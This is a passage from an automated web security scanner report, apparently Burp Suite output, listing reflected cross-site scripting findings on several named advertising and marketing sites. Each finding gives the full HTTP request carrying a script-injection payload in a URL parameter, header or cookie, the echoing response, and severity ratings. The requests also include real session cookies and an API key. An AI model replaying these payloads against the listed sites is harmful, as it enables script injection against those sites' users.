Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:02 GMT;path=/
Content-Length: 20694

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads clo.gif2112e"style="x:expression(alert(1))"2aaa2fd7024" />
...[SNIP]...

3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74187<a%20b%3dc>5f12c9056f0 was submitted in the REST URL parameter 3. This input was echoed as 74187<a b=c>5f12c9056f0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.gif74187<a%20b%3dc>5f12c9056f0?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:32 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:32 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:32 GMT;path=/
Content-Length: 20501

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.gif74187<a b=c>5f12c9056f0 for <strong>
...[SNIP]...

3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/preferences_sf/login.sp

Issue detail

The value of the failureHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f35f"><script>alert(1)</script>3b6fd41a04e was submitted in the failureHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download&failureHandler=7f35f"><script>alert(1)</script>3b6fd41a04e&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:59:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download','7f35f"><script>alert(1)</script>3b6fd41a04e'); return false;">
...[SNIP]...

3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/preferences_sf/login.sp

Issue detail

The value of the successHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3da"><script>alert(1)</script>bfa58457b61 was submitted in the successHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download7f3da"><script>alert(1)</script>bfa58457b61&failureHandler=&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:58:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download7f3da"><script>alert(1)</script>bfa58457b61',''); return false;">
...[SNIP]...

3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the &fld[] request parameter is copied into the HTML document as plain text between tags. The payload 1cd43<script>alert(1)</script>ec8a814e59f was submitted in the &fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName1cd43<script>alert(1)</script>ec8a814e59f&fld[]=LastName&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName1cd43<script>alert(1)</script>ec8a814e59f': '',
'LastName': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe
...[SNIP]...

3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the fld[] request parameter is copied into the HTML document as plain text between tags. The payload 6bdab<script>alert(1)</script>dffdd7b3753 was submitted in the fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName&fld[]=LastName6bdab<script>alert(1)</script>dffdd7b3753&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName': '',
'LastName6bdab<script>alert(1)</script>dffdd7b3753': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe': '',
'': ''
})
...[SNIP]...

3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d670d<script>alert(1)</script>b99a9855237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d670d<script>alert(1)</script>b99a9855237
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:24 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: d670d<script>alert(1)</script>b99a9855237

3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a3e'%3balert(1)//6c633eca4ea was submitted in the cli cookie. This input was echoed as f1a3e';alert(1)//6c633eca4ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83cf1a3e'%3balert(1)//6c633eca4ea; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
anguage="Javascript">CollectiveMedia.createAndAttachAd("cm-10118186198_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10118186198_1311271253,11fda490648f83cf1a3e';alert(1)//6c633eca4ea&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10118186198_1311271253%2C11fda490648f83cf1a3e%27%3Baler
...[SNIP]...

3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8adf7"%3balert(1)//1d3130726fc was submitted in the cli cookie. This input was echoed as 8adf7";alert(1)//1d3130726fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c8adf7"%3balert(1)//1d3130726fc; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=526077459;redirect=http://a.collective-media.net/datapair?net=qc&id=11fda490648f83c8adf7";alert(1)//1d3130726fc&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ws.visualdna.com/syncs/collective",false);CollectiveMedia.a
...[SNIP]...

3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1e5de<script>alert(1)</script>ffc4383bf9a was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=11e5de<script>alert(1)</script>ffc4383bf9a; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '11e5de<script>alert(1)</script>ffc4383bf9a', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27
...[SNIP]...

3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload bb9ff<script>alert(1)</script>1dc8b182675 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
false);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060":
...[SNIP]...

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 68388<script>alert(1)</script>e06b9decce1 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
